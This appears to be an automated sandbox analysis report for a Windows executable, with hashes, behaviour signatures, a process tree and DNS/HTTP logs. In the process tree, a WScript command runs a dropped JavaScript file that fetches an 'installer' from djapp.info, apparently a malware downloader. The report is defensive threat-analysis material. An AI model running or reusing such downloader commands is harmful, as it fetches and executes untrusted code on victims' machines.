Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

3

7541be9044...18.exe

windows7-x64

8

7541be9044...18.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    142s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/05/2024, 10:58 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    7541be9044f3a1d7ab258bb36f857a2e

  • SHA1

    25b38a97fd748ef26874fa390f98597013ef102d

  • SHA256

    b42dfb8edbed135a21427c868a0154aea5b04ae8cd7077fe078a297790ecbc19

  • SHA512

    40343f0d547e57b4d26f776fd3a1bdf6b791f0ba0e26355968a4c899926cf89e320bc5dbcf72d88ccef5fa145beb099d6a9e4d17320c80ccfbd61c69ea4fbcda

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3+i:/7BSH8zUB+nGESaaRvoB7FJNndn2

Score
8/10
execution

Malware Config

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1620
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufFF11.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufFF11.exe
      2⤵
      • Blocklisted process makes network request
      PID:4256
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufFF11.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufFF11.exe
      2⤵
      • Blocklisted process makes network request
      PID:4644
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufFF11.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufFF11.exe
      2⤵
      • Blocklisted process makes network request
      PID:2224
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufFF11.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufFF11.exe
      2⤵
      • Blocklisted process makes network request
      PID:4876
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufFF11.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufFF11.exe
      2⤵
      • Blocklisted process makes network request
      PID:4480
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1792 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:1236

    Network

    • flag-us
      DNS
      149.220.183.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      149.220.183.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      172.210.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.210.232.199.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      www.djapp.info
      WScript.exe
      Remote address:
      8.8.8.8:53
      Request
      www.djapp.info
      IN A
      Response
    • flag-us
      DNS
      www.djapp.info
      WScript.exe
      Remote address:
      8.8.8.8:53
      Request
      www.djapp.info
      IN A
      Response
    • flag-us
      DNS
      bi.downthat.com
      WScript.exe
      Remote address:
      8.8.8.8:53
      Request
      bi.downthat.com
      IN A
      Response
      bi.downthat.com
      IN CNAME
      traff-1.hugedomains.com
      traff-1.hugedomains.com
      IN CNAME
      hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com
      hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com
      IN A
      54.209.32.212
      hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com
      IN A
      52.71.57.184
    • flag-us
      GET
      http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
      WScript.exe
      Remote address:
      54.209.32.212:80
      Request
      GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
      Accept: */*
      Accept-Language: en-us
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: bi.downthat.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 302 Found
      content-length: 0
      date: Sun, 26 May 2024 10:59:33 GMT
      location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    • flag-us
      DNS
      chromewebstore.googleapis.com
      Remote address:
      8.8.8.8:53
      Request
      chromewebstore.googleapis.com
      IN A
      Response
      chromewebstore.googleapis.com
      IN A
      172.217.169.10
      chromewebstore.googleapis.com
      IN A
      216.58.212.202
      chromewebstore.googleapis.com
      IN A
      216.58.212.234
      chromewebstore.googleapis.com
      IN A
      142.250.179.234
      chromewebstore.googleapis.com
      IN A
      142.250.180.10
      chromewebstore.googleapis.com
      IN A
      142.250.187.202
      chromewebstore.googleapis.com
      IN A
      142.250.187.234
      chromewebstore.googleapis.com
      IN A
      142.250.178.10
      chromewebstore.googleapis.com
      IN A
      172.217.16.234
      chromewebstore.googleapis.com
      IN A
      142.250.200.10
      chromewebstore.googleapis.com
      IN A
      142.250.200.42
      chromewebstore.googleapis.com
      IN A
      216.58.201.106
      chromewebstore.googleapis.com
      IN A
      216.58.204.74
    • flag-us
      DNS
      chromewebstore.googleapis.com
      Remote address:
      8.8.8.8:53
      Request
      chromewebstore.googleapis.com
      IN Unknown
      Response
    • flag-us
      DNS
      www.hugedomains.com
      WScript.exe
      Remote address:
      8.8.8.8:53
      Request
      www.hugedomains.com
      IN A
      Response
      www.hugedomains.com
      IN A
      172.67.70.191
      www.hugedomains.com
      IN A
      104.26.7.37
      www.hugedomains.com
      IN A
      104.26.6.37
    • flag-us
      DNS
      212.32.209.54.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      212.32.209.54.in-addr.arpa
      IN PTR
      Response
      212.32.209.54.in-addr.arpa
      IN PTR
      ec2-54-209-32-212 compute-1 amazonawscom
    • flag-us
      DNS
      pki.goog
      Remote address:
      8.8.8.8:53
      Request
      pki.goog
      IN A
      Response
      pki.goog
      IN A
      216.239.32.29
    • flag-us
      DNS
      pki.goog
      Remote address:
      8.8.8.8:53
      Request
      pki.goog
      IN Unknown
      Response
    • flag-us
      GET
      http://pki.goog/gsr1/gsr1.crt
      Remote address:
      216.239.32.29:80
      Request
      GET /gsr1/gsr1.crt HTTP/1.1
      Host: pki.goog
      Connection: keep-alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
      Accept-Encoding: gzip, deflate
      Accept-Language: en-US,en;q=0.9
      Response
      HTTP/1.1 200 OK
      Accept-Ranges: bytes
      Content-Encoding: gzip
      Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
      Cross-Origin-Resource-Policy: cross-origin
      Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
      Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
      Content-Length: 797
      X-Content-Type-Options: nosniff
      Server: sffe
      X-XSS-Protection: 0
      Date: Sun, 26 May 2024 10:45:42 GMT
      Expires: Sun, 26 May 2024 11:35:42 GMT
      Cache-Control: public, max-age=3000
      Age: 832
      Last-Modified: Wed, 20 May 2020 16:45:00 GMT
      Content-Type: application/pkix-cert
      Vary: Accept-Encoding
    • flag-us
      GET
      http://pki.goog/repo/certs/gtsr1.der
      Remote address:
      216.239.32.29:80
      Request
      GET /repo/certs/gtsr1.der HTTP/1.1
      Host: pki.goog
      Connection: keep-alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
      Accept-Encoding: gzip, deflate
      Accept-Language: en-US,en;q=0.9
      Response
      HTTP/1.1 200 OK
      Accept-Ranges: bytes
      Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
      Cross-Origin-Resource-Policy: cross-origin
      Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
      Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
      Content-Length: 1371
      X-Content-Type-Options: nosniff
      Server: sffe
      X-XSS-Protection: 0
      Date: Sun, 26 May 2024 10:25:03 GMT
      Expires: Sun, 26 May 2024 11:15:03 GMT
      Cache-Control: public, max-age=3000
      Age: 2071
      Last-Modified: Sun, 25 Jun 2023 02:58:00 GMT
      Content-Type: application/pkix-cert
      Vary: Accept-Encoding
    • flag-us
      GET
      http://pki.goog/repo/certs/gts1c3.der
      Remote address:
      216.239.32.29:80
      Request
      GET /repo/certs/gts1c3.der HTTP/1.1
      Host: pki.goog
      Connection: keep-alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
      Accept-Encoding: gzip, deflate
      Accept-Language: en-US,en;q=0.9
      Response
      HTTP/1.1 200 OK
      Accept-Ranges: bytes
      Content-Encoding: gzip
      Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
      Cross-Origin-Resource-Policy: cross-origin
      Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
      Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
      Content-Length: 1304
      X-Content-Type-Options: nosniff
      Server: sffe
      X-XSS-Protection: 0
      Date: Sun, 26 May 2024 10:53:16 GMT
      Expires: Sun, 26 May 2024 11:43:16 GMT
      Cache-Control: public, max-age=3000
      Age: 378
      Last-Modified: Mon, 17 Aug 2020 09:45:00 GMT
      Content-Type: application/pkix-cert
      Vary: Accept-Encoding
    • flag-us
      DNS
      29.32.239.216.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      29.32.239.216.in-addr.arpa
      IN PTR
      Response
      29.32.239.216.in-addr.arpa
      IN PTR
      any-in-201d1e100net
    • flag-us
      DNS
      10.169.217.172.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      10.169.217.172.in-addr.arpa
      IN PTR
      Response
      10.169.217.172.in-addr.arpa
      IN PTR
      lhr25s26-in-f101e100net
    • flag-us
      DNS
      228.249.119.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      228.249.119.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      183.59.114.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      183.59.114.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      www.djapp.info
      WScript.exe
      Remote address:
      8.8.8.8:53
      Request
      www.djapp.info
      IN A
      Response
    • flag-us
      GET
      http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
      WScript.exe
      Remote address:
      54.209.32.212:80
      Request
      GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
      Accept: */*
      Accept-Language: en-us
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: bi.downthat.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 302 Found
      content-length: 0
      date: Sun, 26 May 2024 10:59:41 GMT
      location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    • flag-us
      DNS
      56.126.166.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      56.126.166.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      133.211.185.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      133.211.185.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      www.djapp.info
      WScript.exe
      Remote address:
      8.8.8.8:53
      Request
      www.djapp.info
      IN A
      Response
    • flag-us
      DNS
      www.djapp.info
      WScript.exe
      Remote address:
      8.8.8.8:53
      Request
      www.djapp.info
      IN A
      Response
    • flag-us
      GET
      http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
      WScript.exe
      Remote address:
      54.209.32.212:80
      Request
      GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
      Accept: */*
      Accept-Language: en-us
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: bi.downthat.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 302 Found
      content-length: 0
      date: Sun, 26 May 2024 10:59:55 GMT
      location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    • flag-us
      DNS
      www.djapp.info
      WScript.exe
      Remote address:
      8.8.8.8:53
      Request
      www.djapp.info
      IN A
      Response
    • flag-us
      GET
      http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
      WScript.exe
      Remote address:
      54.209.32.212:80
      Request
      GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
      Accept: */*
      Accept-Language: en-us
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: bi.downthat.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 302 Found
      content-length: 0
      date: Sun, 26 May 2024 11:00:07 GMT
      location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    • flag-us
      DNS
      www.djapp.info
      WScript.exe
      Remote address:
      8.8.8.8:53
      Request
      www.djapp.info
      IN A
      Response
    • flag-us
      DNS
      bi.downthat.com
      WScript.exe
      Remote address:
      8.8.8.8:53
      Request
      bi.downthat.com
      IN A
      Response
      bi.downthat.com
      IN CNAME
      traff-2.hugedomains.com
      traff-2.hugedomains.com
      IN CNAME
      hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
      hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
      IN A
      3.130.204.160
      hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
      IN A
      3.130.253.23
    • flag-us
      GET
      http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
      WScript.exe
      Remote address:
      3.130.204.160:80
      Request
      GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
      Accept: */*
      Accept-Language: en-us
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: bi.downthat.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 302 Found
      content-length: 0
      date: Sun, 26 May 2024 11:00:19 GMT
      location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    • flag-us
      DNS
      160.204.130.3.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      160.204.130.3.in-addr.arpa
      IN PTR
      Response
      160.204.130.3.in-addr.arpa
      IN PTR
      ec2-3-130-204-160 us-east-2compute amazonawscom
    • flag-us
      DNS
      91.90.14.23.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      91.90.14.23.in-addr.arpa
      IN PTR
      Response
      91.90.14.23.in-addr.arpa
      IN PTR
      a23-14-90-91deploystaticakamaitechnologiescom
    • flag-us
      DNS
      14.227.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      14.227.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      8.173.189.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.173.189.20.in-addr.arpa
      IN PTR
      Response
    • 54.209.32.212:80
      http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
      http
      WScript.exe
      691 B
       283 B
       6
      3

      HTTP Request

      GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

      HTTP Response

      302
    • 172.217.169.10:443
      chromewebstore.googleapis.com
      tls
      1.0kB
       5.2kB
       8
      8
    • 216.239.32.29:80
      http://pki.goog/repo/certs/gts1c3.der
      http
      1.3kB
       6.1kB
       10
      10

      HTTP Request

      GET http://pki.goog/gsr1/gsr1.crt

      HTTP Response

      200

      HTTP Request

      GET http://pki.goog/repo/certs/gtsr1.der

      HTTP Response

      200

      HTTP Request

      GET http://pki.goog/repo/certs/gts1c3.der

      HTTP Response

      200
    • 54.209.32.212:80
      http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
      http
      WScript.exe
      691 B
       283 B
       6
      3

      HTTP Request

      GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

      HTTP Response

      302
    • 172.67.70.191:443
      www.hugedomains.com
      WScript.exe
      98 B
       52 B
       2
      1
    • 54.209.32.212:80
      http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
      http
      WScript.exe
      691 B
       283 B
       6
      3

      HTTP Request

      GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

      HTTP Response

      302
    • 54.209.32.212:80
      http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
      http
      WScript.exe
      691 B
       283 B
       6
      3

      HTTP Request

      GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

      HTTP Response

      302
    • 3.130.204.160:80
      http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
      http
      WScript.exe
      691 B
       283 B
       6
      3

      HTTP Request

      GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

      HTTP Response

      302
    • 8.8.8.8:53
      149.220.183.52.in-addr.arpa
      dns
      73 B
       147 B
       1
      1

      DNS Request

      149.220.183.52.in-addr.arpa

    • 8.8.8.8:53
      172.210.232.199.in-addr.arpa
      dns
      74 B
       128 B
       1
      1

      DNS Request

      172.210.232.199.in-addr.arpa

    • 8.8.8.8:53
      www.djapp.info
      dns
      WScript.exe
      120 B
       278 B
       2
      2

      DNS Request

      www.djapp.info

      DNS Request

      www.djapp.info

    • 8.8.8.8:53
      bi.downthat.com
      dns
      WScript.exe
      61 B
       191 B
       1
      1

      DNS Request

      bi.downthat.com

      DNS Response

      54.209.32.212
      52.71.57.184

    • 8.8.8.8:53
      chromewebstore.googleapis.com
      dns
      75 B
       283 B
       1
      1

      DNS Request

      chromewebstore.googleapis.com

      DNS Response

      172.217.169.10
      216.58.212.202
      216.58.212.234
      142.250.179.234
      142.250.180.10
      142.250.187.202
      142.250.187.234
      142.250.178.10
      172.217.16.234
      142.250.200.10
      142.250.200.42
      216.58.201.106
      216.58.204.74

    • 8.8.8.8:53
      chromewebstore.googleapis.com
      dns
      75 B
       132 B
       1
      1

      DNS Request

      chromewebstore.googleapis.com

    • 8.8.8.8:53
      www.hugedomains.com
      dns
      WScript.exe
      65 B
       113 B
       1
      1

      DNS Request

      www.hugedomains.com

      DNS Response

      172.67.70.191
      104.26.7.37
      104.26.6.37

    • 8.8.8.8:53
      212.32.209.54.in-addr.arpa
      dns
      72 B
       127 B
       1
      1

      DNS Request

      212.32.209.54.in-addr.arpa

    • 8.8.8.8:53
      pki.goog
      dns
      54 B
       70 B
       1
      1

      DNS Request

      pki.goog

      DNS Response

      216.239.32.29

    • 8.8.8.8:53
      pki.goog
      dns
      54 B
       128 B
       1
      1

      DNS Request

      pki.goog

    • 8.8.8.8:53
      29.32.239.216.in-addr.arpa
      dns
      72 B
       107 B
       1
      1

      DNS Request

      29.32.239.216.in-addr.arpa

    • 8.8.8.8:53
      10.169.217.172.in-addr.arpa
      dns
      73 B
       112 B
       1
      1

      DNS Request

      10.169.217.172.in-addr.arpa

    • 8.8.8.8:53
      228.249.119.40.in-addr.arpa
      dns
      73 B
       159 B
       1
      1

      DNS Request

      228.249.119.40.in-addr.arpa

    • 8.8.8.8:53
      183.59.114.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      183.59.114.20.in-addr.arpa

    • 8.8.8.8:53
      www.djapp.info
      dns
      WScript.exe
      60 B
       139 B
       1
      1

      DNS Request

      www.djapp.info

    • 8.8.8.8:53
      56.126.166.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      56.126.166.20.in-addr.arpa

    • 8.8.8.8:53
      133.211.185.52.in-addr.arpa
      dns
      73 B
       147 B
       1
      1

      DNS Request

      133.211.185.52.in-addr.arpa

    • 8.8.8.8:53
      www.djapp.info
      dns
      WScript.exe
      120 B
       278 B
       2
      2

      DNS Request

      www.djapp.info

      DNS Request

      www.djapp.info

    • 8.8.8.8:53
      www.djapp.info
      dns
      WScript.exe
      60 B
       139 B
       1
      1

      DNS Request

      www.djapp.info

    • 8.8.8.8:53
      www.djapp.info
      dns
      WScript.exe
      60 B
       139 B
       1
      1

      DNS Request

      www.djapp.info

    • 8.8.8.8:53
      bi.downthat.com
      dns
      WScript.exe
      61 B
       191 B
       1
      1

      DNS Request

      bi.downthat.com

      DNS Response

      3.130.204.160
      3.130.253.23

    • 8.8.8.8:53
      160.204.130.3.in-addr.arpa
      dns
      72 B
       135 B
       1
      1

      DNS Request

      160.204.130.3.in-addr.arpa

    • 8.8.8.8:53
      91.90.14.23.in-addr.arpa
      dns
      70 B
       133 B
       1
      1

      DNS Request

      91.90.14.23.in-addr.arpa

    • 8.8.8.8:53
      14.227.111.52.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      14.227.111.52.in-addr.arpa

    • 8.8.8.8:53
      8.173.189.20.in-addr.arpa
      dns
      71 B
       157 B
       1
      1

      DNS Request

      8.173.189.20.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\fufFF11.js
      Filesize

      3KB

      MD5

      3813cab188d1de6f92f8b82c2059991b

      SHA1

      4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

      SHA256

      a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

      SHA512

      83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

      Download Submit

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.